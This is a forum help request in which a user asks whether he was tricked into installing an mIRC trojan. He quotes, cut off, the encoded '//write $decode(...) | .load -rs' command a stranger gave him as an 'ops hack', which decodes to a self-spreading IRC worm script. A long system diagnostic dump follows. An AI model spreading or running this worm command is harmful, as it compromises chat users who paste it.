PDA

View Full Version : suspected mirc backdoor thin help eurgent


pneboy
11-05-09, 14:57
i think that someone might of tricked me into installing a trojan into my computer throught the use of mirc he told me to type this if it helps

[14:32] type this hack will give u ops //write * $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljay B8IC50aW1lcqAgMCAxMjAgLmpvaW4gfCAubXNnICRuaWNrIERv IFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID 8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsg ZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKS xtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIo MTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs * | //mo

diagnose.exe

------------------------------------------------------
Diagnostic tool developed for www.tombraiderforums.com
------------------------------------------------------
Version : 3.12
Author : Simulation

Select All (Ctrl A) then Copy (Ctrl C) and paste (Ctrl V) the text in Notepad into a reply on the forum.

Operating System

Windows Vista Home Basic Edition 32bit Service Pack 1 build 6001

COMMAND.COM
COMMAND.COM has been installed

Autoexec.NT
@echo off
lh %SystemRoot%\system32\mscdexnt.exe
lh %SystemRoot%\system32\redir
lh %SystemRoot%\system32\dosx
SET BLASTER=A220 I5 D1 P330 T3

Config.NT
dos=high, umb
device=%SystemRoot%\system32\himem.sys
files=40

Programs Currently Running

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Services 0 24 K
System 4 Services 0 7,036 K
smss.exe 440 Services 0 104 K
csrss.exe 508 Services 0 1,520 K
wininit.exe 552 Services 0 108 K
csrss.exe 564 Console 1 2,924 K
services.exe 604 Services 0 1,780 K
lsass.exe 620 Services 0 2,224 K
lsm.exe 628 Services 0 1,280 K
winlogon.exe 748 Console 1 1,012 K
svchost.exe 896 Services 0 3,616 K
svchost.exe 960 Services 0 4,072 K
svchost.exe 996 Services 0 4,680 K
svchost.exe 1088 Services 0 3,788 K
svchost.exe 1120 Services 0 47,772 K
svchost.exe 1148 Services 0 12,840 K
audiodg.exe 1252 Services 0 11,312 K
SLsvc.exe 1288 Services 0 128 K
svchost.exe 1324 Services 0 2,304 K
svchost.exe 1480 Services 0 4,528 K
spoolsv.exe 1648 Services 0 2,064 K
svchost.exe 1672 Services 0 3,484 K
avgwdsvc.exe 1928 Services 0 1,832 K
mDNSResponder.exe 1952 Services 0 368 K
iviRegMgr.exe 2028 Services 0 68 K
svchost.exe 320 Services 0 124 K
svchost.exe 380 Services 0 164 K
TestHandler.exe 480 Services 0 428 K
svchost.exe 432 Services 0 896 K
SearchIndexer.exe 1140 Services 0 10,540 K
avgemc.exe 292 Services 0 792 K
avgrsx.exe 1560 Services 0 16,964 K
avgcsrvx.exe 2252 Services 0 60 K
taskeng.exe 2664 Console 1 2,112 K
dwm.exe 2700 Console 1 63,564 K
MSASCui.exe 2952 Console 1 1,548 K
igfxtray.exe 2996 Console 1 284 K
hkcmd.exe 3012 Console 1 1,132 K
igfxpers.exe 3028 Console 1 292 K
RtHDVCpl.exe 3040 Console 1 756 K
HotkeyApp.exe 3048 Console 1 1,092 K
SynTPStart.exe 3056 Console 1 264 K
igfxsrvc.exe 3104 Console 1 2,048 K
avgtray.exe 3128 Console 1 1,012 K
jusched.exe 3176 Console 1 244 K
GrooveMonitor.exe 3200 Console 1 1,240 K
iTunesHelper.exe 3216 Console 1 480 K
sidebar.exe 3280 Console 1 1,548 K
daemon.exe 3336 Console 1 736 K
SynTPEnh.exe 3984 Console 1 1,156 K
WisLMSvc.exe 956 Services 0 1,364 K
WmiPrvSE.exe 692 Services 0 2,880 K
sidebar.exe 2788 Console 1 1,204 K
sidebar.exe 2840 Console 1 800 K
iPodService.exe 4060 Services 0 1,008 K
taskeng.exe 3308 Services 0 460 K
csrss.exe 4368 2 484 K
winlogon.exe 5572 2 132 K
taskeng.exe 4876 2 672 K
dwm.exe 3228 2 228 K
MSASCui.exe 4176 2 1,296 K
hkcmd.exe 3604 2 1,008 K
igfxpers.exe 5444 2 268 K
RtHDVCpl.exe 5500 2 412 K
HotkeyApp.exe 5304 2 916 K
SynTPStart.exe 5924 2 208 K
GoogleDesktop.exe 4268 2 828 K
avgtray.exe 3420 2 772 K
jusched.exe 1192 2 236 K
GrooveMonitor.exe 4976 2 1,224 K
iTunesHelper.exe 1872 2 208 K
sidebar.exe 5648 2 1,880 K
daemon.exe 5900 2 512 K
SynTPEnh.exe 4960 2 272 K
igfxsrvc.exe 1512 2 2,036 K
explorer.exe 5156 Console 1 48,256 K
taskeng.exe 5252 Console 1 436 K
RapidshareAutoDownloader. 7828 Console 1 18,972 K
GoogleUpdate.exe 4984 Console 1 300 K
msfeedssync.exe 6832 Console 1 900 K
avgnsx.exe 700 Services 0 428 K
msfeedssync.exe 3816 2 804 K
SUPER.exe 6116 2 1,500 K
explorer.exe 3652 2 3,592 K
LogonUI.exe 5340 2 160 K
wuauclt.exe 4104 Console 1 228 K
wmpnetwk.exe 7248 Services 0 892 K
AppleMobileDeviceService. 668 Services 0 176 K
firefox.exe 6932 Console 1 77,220 K
ObjectDock.exe 6404 Console 1 4,852 K
wmpnscfg.exe 7868 2 1,452 K
wmpnscfg.exe 6332 Console 1 432 K
avgui.exe 6820 Console 1 5,652 K
avgscanx.exe 6636 Console 1 2,176 K
avgcsrvx.exe 4780 Console 1 33,920 K
taskeng.exe 7756 Services 0 4,024 K
SearchProtocolHost.exe 6088 Services 0 7,880 K
SearchFilterHost.exe 6288 Services 0 5,128 K
diagnose.exe 4460 Console 1 8,156 K
ns703B.tmp 7304 Console 1 4,468 K
cmd.exe 7420 Console 1 2,012 K
tasklist.exe 1236 Console 1 6,552 K
notepad.exe 1944 Console 1 7,336 K
WmiPrvSE.exe 5184 Services 0 5,768 K

System Event Log - Warning and Errors Only (last 24hrs)

Event Log from 08:00am on the 10/05/2009

Tomb Raider Game Setup Information

Tomb Raider 1 Installed
TOMB.EXE File Size = 873739 bytes - Glide Emulator version installed by ATR Installer


trai.dat not found


hmiset.cfg

[DIGITAL]
DeviceName = Sound Blaster 16/AWE32
DeviceIRQ = 7
DeviceDMA = 1
DevicePort = 0x220
DeviceID = 0xe016

[MIDI]
DeviceName = No MIDI Device
DevicePort = 0xffffffff
DeviceID = 0xffffffff

NTVDM.EXE .COM
NTVDM.EXE has been installed

VDMSound
VDMSound is not installed
VLP Files on Desktop
VLP files are NOT present on Desktop



VLP Files in C:\TOMBRAID
VLP files are NOT present in c:\tombraid


Tomb Raider 1 Gold - Unfinished Business Installed
TOMBUB.EXE File Size = 867563 bytes - Glide Emulator version installed


Tomb Raider II Installed
Installed in C:\Program Files\Core Design
Compatibility Layer Disabled
Tomb2.exe File Size = 944640 bytes - Unknown version (29159397-921047808)
C:\Program Files\Core Design\winplay.dll - File Not Found
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\winstr.dll - File Not Found
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider III Installed
Installed in C:\Program Files\Core Design\Tomb Raider III
Compatibility Layer Disabled
Tomb3.exe File Size = 966656 bytes - Unknown version (29236700-777930496)
C:\Program Files\Core Design\Tomb Raider III\winplay.dll - Version 2.0.0.6
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\Tomb Raider III\winstr.dll - Version 2.0.0.4
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider - The Lost Artifact Installed
Installed in C:\Program Files\Core Design\Tomb Raider - The Lost Artifact
Compatibility Layer Enabled = WIN98
tr3gold.exe File Size = 946176 bytes - Unknown version (29449555393246720)
C:\Program Files\Core Design\Tomb Raider - The Lost Artifact\winplay.dll - Version 1.0.0.1
C:\Windows\System32\winplay.dll - Version 2.0.0.12
C:\Program Files\Core Design\Tomb Raider - The Lost Artifact\winstr.dll - Version 1.0.0.1
C:\Windows\System32\winstr.dll - Version 2.0.0.13

Tomb Raider - The Last Revelation Installed
Installed in C:\Program Files\Core Design\Tomb Raider - The Last Revelation
Compatibility Layer Disabled
TOMB4.EXE File Size = 790528 bytes - Unkown version (295323781376890112)

Tomb Raider - Angel of Darkness Installed
Installed in C:\Program Files\Eidos Interactive\TRAOD
Compatibility Layer Disabled


DirectX Diagnostics Report

------------------
System Information
------------------
Time of this report: 5/11/2009, 15:54:09
Machine name: USER-PC
Operating System: Windows Vista™ Home Basic (6.0, Build 6001) Service Pack 1 (6001.vistasp1_gdr.080917-1612)
Language: English (Regional Setting: English)
System Manufacturer: FUJITSU SIEMENS
System Model: AMILO Li 2727
BIOS: Ver 1.00PARTTBLM
Processor: n/a
Memory: 1014MB RAM
Page File: 1753MB used, 790MB available
Windows Dir: C:\Windows
DirectX Version: DirectX 10
DX Setup Parameters: Not found
DxDiag Version: 6.00.6001.18000 32bit Unicode

------------
DxDiag Notes
------------
Display Tab 1: No problems found.
Sound Tab 1: No problems found.
Input Tab: No problems found.

--------------------
DirectX Debug Levels
--------------------
Direct3D: 0/4 (retail)
DirectDraw: 0/4 (retail)
DirectInput: 0/5 (retail)
DirectMusic: 0/5 (retail)
DirectPlay: 0/9 (retail)
DirectSound: 0/5 (retail)
DirectShow: 0/6 (retail)

---------------
Display Devices
---------------
Card name: Mobile Intel(R) 965 Express Chipset Family
Manufacturer: Intel Corporation
Chip type: Mobile Intel(R) 965 Express Chipset Family
DAC type: Internal
Device Key: Enum\PCI\VEN_8086&DEV_2A02&SUBSYS_11231734&REV_03
Display Memory: 251 MB
Dedicated Memory: 0 MB
Shared Memory: 251 MB
Current Mode: 1280 x 800 (32 bit) (60Hz)
Monitor: Generic PnP Monitor
Driver Name: igdumd32.dll
Driver Version: 7.14.0010.1283 (English)
DDI Version: 9Ex
Driver Attributes: Final Retail
Driver Date/Size: 5/31/2007 09:51:14, 2551808 bytes
WHQL Logo'd: n/a
WHQL Date Stamp: n/a
Device Identifier: {D7B78E66-6942-11CF-8771-2931A2C2CA35}
Vendor ID: 0x8086
Device ID: 0x2A02
SubSys ID: 0x11231734
Revision ID: 0x0003
Revision ID: 0x0003
Video Accel: ModeMPEG2_A ModeMPEG2_C
Deinterlace Caps: {BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YUY2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(UYVY,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(YV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(NV12,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC1,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC2,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC3,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(IMC4,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(S340,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(S340,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(S340,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
{BF752EF6-8CC4-457A-BE1B-08BD1CAEEE9F}: Format(In/Out)=(S342,YUY2) Frames(Prev/Fwd/Back)=(0,0,1) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_EdgeFiltering
{5A54A0C9-C7EC-4BD9-8EDE-F3C75DC4393B}: Format(In/Out)=(S342,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend
{335AA36E-7884-43A4-9C91-7F87FAF3E37E}: Format(In/Out)=(S342,YUY2) Frames(Prev/Fwd/Back)=(0,0,0) Caps=VideoProcess_YUV2RGB VideoProcess_StretchX VideoProcess_StretchY VideoProcess_AlphaBlend DeinterlaceTech_BOBVerticalStretch
DDraw Status: Enabled
D3D Status: Enabled
AGP Status: Enabled

-------------
Sound Devices
-------------
Description: Speakers (Realtek High Definition Audio)
Default Sound Playback: Yes
Default Voice Playback: Yes
Hardware ID: HDAUDIO\FUNC_01&VEN_10EC&DEV_0268&SUBSYS_17341123&REV_1000
Manufacturer ID: 1
Product ID: 100
Type: WDM
Driver Name: RTKVHDA.sys
Driver Version: 6.00.0001.5449 (English)
Driver Attributes: Final Retail
WHQL Logo'd: n/a
Date and Size: 7/18/2007 18:32:40, 1841312 bytes
Other Files:
Driver Provider: Realtek Semiconductor Corp.
HW Accel Level: Basic
Cap Flags: 0x0
Min/Max Sample Rate: 0, 0
Static/Strm HW Mix Bufs: 0, 0
Static/Strm HW 3D Bufs: 0, 0
HW Memory: 0
Voice Management: No
EAX(tm) 2.0 Listen/Src: No, No
I3DL2(tm) Listen/Src: No, No
Sensaura(tm) ZoomFX(tm): No

---------------------
Sound Capture Devices
---------------------
-------------------
DirectInput Devices
-------------------
Device Name: Mouse
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Device Name: Keyboard
Attached: 1
Controller ID: n/a
Vendor/Product ID: n/a
FF Driver: n/a

Poll w/ Interrupt: No

-----------
USB Devices
-----------
+ USB Root Hub
| Vendor/Product ID: 0x8086, 0x2831
| Matching Device ID: usb\root_hub
| Service: usbhub
| Driver: usbhub.sys, 1/21/2008 03:32:24, 194560 bytes
| Driver: usbd.sys, 1/21/2008 03:32:24, 5888 bytes

----------------
Gameport Devices
----------------

------------
PS/2 Devices
------------
+ Standard PS/2 Keyboard
| Matching Device ID: *pnp0303
| Service: i8042prt
| Driver: i8042prt.sys, 1/21/2008 03:32:45, 54784 bytes
| Driver: kbdclass.sys, 1/21/2008 03:32:49, 35384 bytes
|
+ Terminal Server Keyboard Driver
| Matching Device ID: root\rdp_kbd
| Upper Filters: kbdclass
| Service: TermDD
| Driver: i8042prt.sys, 1/21/2008 03:32:45, 54784 bytes
| Driver: kbdclass.sys, 1/21/2008 03:32:49, 35384 bytes
|
+ Synaptics PS/2 Port TouchPad
| Matching Device ID: *syn0310
| Upper Filters: SynTP
| Service: i8042prt
|
+ Terminal Server Mouse Driver
| Matching Device ID: root\rdp_mou
| Upper Filters: mouclass
| Service: TermDD
| Driver: termdd.sys, 1/21/2008 03:32:21, 54328 bytes
| Driver: sermouse.sys, 1/21/2008 03:32:45, 19968 bytes
| Driver: mouclass.sys, 1/21/2008 03:32:45, 34360 bytes

------------------------
Disk & DVD/CD-ROM Drives
------------------------
Drive: C:
Free Space: 12.8 GB
Total Space: 69.5 GB
File System: NTFS
Model: WDC WD1200BEVS-22UST0

Drive: D:
Free Space: 35.2 GB
Total Space: 36.0 GB
File System: NTFS
Model: WDC WD1200BEVS-22UST0

Drive: E:
Model: Optiarc DVD RW AD-7590A ATA Device
Driver: c:\windows\system32\drivers\cdrom.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:23, 67072 bytes

Drive: F:
Model: KTSVILO WXURC5Y SCSI CdRom Device
Driver: c:\windows\system32\drivers\cdrom.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:23, 67072 bytes

--------------
System Devices
--------------
Name: Mobile Intel(R) 965 Express Chipset Family
Device ID: PCI\VEN_8086&DEV_2A03&SUBSYS_11231734&REV_03\3&21436425&0&11
Driver: n/a

Name: Mobile Intel(R) 965 Express Chipset Family
Device ID: PCI\VEN_8086&DEV_2A02&SUBSYS_11231734&REV_03\3&21436425&0&10
Driver: C:\Windows\system32\DRIVERS\igdkmd32.sys, 7.14.0010.1283 (English), 5/31/2007 09:51:00, 1774080 bytes
Driver: C:\Windows\system32\igdumd32.dll, 7.14.0010.1283 (English), 5/31/2007 09:51:14, 2551808 bytes
Driver: C:\Windows\system32\igmedkrn.dll, 5/31/2007 09:49:06, 910464 bytes
Driver: C:\Windows\system32\iglhxs32.vp, 5/31/2007 10:35:28, 25632 bytes
Driver: C:\Windows\system32\iglhxo32.vp, 5/31/2007 08:55:48, 2096 bytes
Driver: C:\Windows\system32\iglhxc32.vp, 5/31/2007 08:55:48, 2096 bytes
Driver: C:\Windows\system32\hccutils.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:24, 102400 bytes
Driver: C:\Windows\system32\igfxsrvc.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:44, 47616 bytes
Driver: C:\Windows\system32\igfxsrvc.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:30, 252696 bytes
Driver: C:\Windows\system32\igfxpph.dll, 7.14.0010.1283 (English), 5/31/2007 09:01:02, 204800 bytes
Driver: C:\Windows\system32\igfxcpl.cpl, 7.14.0010.1283 (English), 5/31/2007 09:00:52, 122880 bytes
Driver: C:\Windows\system32\igfxcfg.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:16, 527128 bytes
Driver: C:\Windows\system32\igfxdev.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:20, 200704 bytes
Driver: C:\Windows\system32\igfxdo.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:32, 135168 bytes
Driver: C:\Windows\system32\igfxtray.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:32, 142104 bytes
Driver: C:\Windows\system32\igfxzoom.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:36, 170776 bytes
Driver: C:\Windows\system32\hkcmd.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:12, 154392 bytes
Driver: C:\Windows\system32\igfxress.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:08, 3293184 bytes
Driver: C:\Windows\system32\igfxpers.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:26, 138008 bytes
Driver: C:\Windows\system32\igfxTMM.dll, 1.00.0000.0001 (English), 5/31/2007 09:01:22, 249856 bytes
Driver: C:\Windows\system32\igfxext.exe, 7.14.0010.1283 (English), 6/6/2007 10:52:20, 166680 bytes
Driver: C:\Windows\system32\igfxexps.dll, 7.14.0010.1283 (English), 5/31/2007 09:00:54, 24576 bytes
Driver: C:\Windows\system32\oemdspif.dll, 7.14.0010.1283 (English), 5/31/2007 09:01:10, 69632 bytes
Driver: C:\Windows\system32\igfxrara.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 159744 bytes
Driver: C:\Windows\system32\igfxrchs.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 110592 bytes
Driver: C:\Windows\system32\igfxrcht.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 110592 bytes
Driver: C:\Windows\system32\igfxrdan.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 172032 bytes
Driver: C:\Windows\system32\igfxrdeu.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 192512 bytes
Driver: C:\Windows\system32\igfxrenu.lrc, 7.14.0010.1283 (English), 5/31/2007 09:00:08, 172032 bytes
Driver: C:\Windows\system32\igfxresp.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 188416 bytes
Driver: C:\Windows\system32\igfxrfin.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 176128 bytes
Driver: C:\Windows\system32\igfxrfra.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 184320 bytes
Driver: C:\Windows\system32\igfxrheb.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 155648 bytes
Driver: C:\Windows\system32\igfxrita.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 188416 bytes
Driver: C:\Windows\system32\igfxrjpn.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 131072 bytes
Driver: C:\Windows\system32\igfxrkor.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 126976 bytes
Driver: C:\Windows\system32\igfxrnld.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 188416 bytes
Driver: C:\Windows\system32\igfxrnor.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrplk.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrptb.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrptg.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrrus.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 180224 bytes
Driver: C:\Windows\system32\igfxrsky.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 176128 bytes
Driver: C:\Windows\system32\igfxrslv.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrsve.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:48, 172032 bytes
Driver: C:\Windows\system32\igfxrtha.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:50, 163840 bytes
Driver: C:\Windows\system32\igfxrcsy.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 176128 bytes
Driver: C:\Windows\system32\igfxrell.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:44, 192512 bytes
Driver: C:\Windows\system32\igfxrhun.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:46, 180224 bytes
Driver: C:\Windows\system32\igfxrtrk.lrc, 7.14.0010.1283 (English), 5/31/2007 09:03:50, 172032 bytes
Driver: C:\Windows\system32\ig4icd32.dll, 7.14.0010.1283 (English), 5/31/2007 09:16:06, 2392064 bytes
Driver: C:\Windows\system32\ig4dev32.dll, 7.14.0010.1283 (English), 5/31/2007 09:11:32, 1589248 bytes
Driver: C:\Windows\system32\igfxCoIn_v1283.dll, 5/31/2007 10:14:00, 204800 bytes

Name: Mobile Intel(R) PM965/GM965/GL960 Express Processor to DRAM Controller - 2A00
Device ID: PCI\VEN_8086&DEV_2A00&SUBSYS_11231734&REV_03\3&21436425&0&00
Driver: n/a

Name: Intel(R) ICH8M Ultra ATA Storage Controllers - 2850
Device ID: PCI\VEN_8086&DEV_2850&SUBSYS_11231734&REV_03\3&21436425&0&F9
Driver: C:\Windows\system32\DRIVERS\intelide.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 17976 bytes
Driver: C:\Windows\system32\DRIVERS\pciidex.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 45112 bytes
Driver: C:\Windows\system32\DRIVERS\atapi.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 21560 bytes
Driver: C:\Windows\system32\DRIVERS\ataport.sys, 6.00.6001.18000 (English), 1/21/2008 03:32:21, 110136 bytes

Name: High Definition Audio Controller
Device ID: PCI\VEN_8086&DEV_284B&SUBSYS_11231734&REV_03\3&21436425&0&D8
Driver: C:\Windows\system32\DRIVERS\hdaudbus.sys, 6.00.6001.17036 (English), 1/21/2008 03:32:47, 53760 bytes

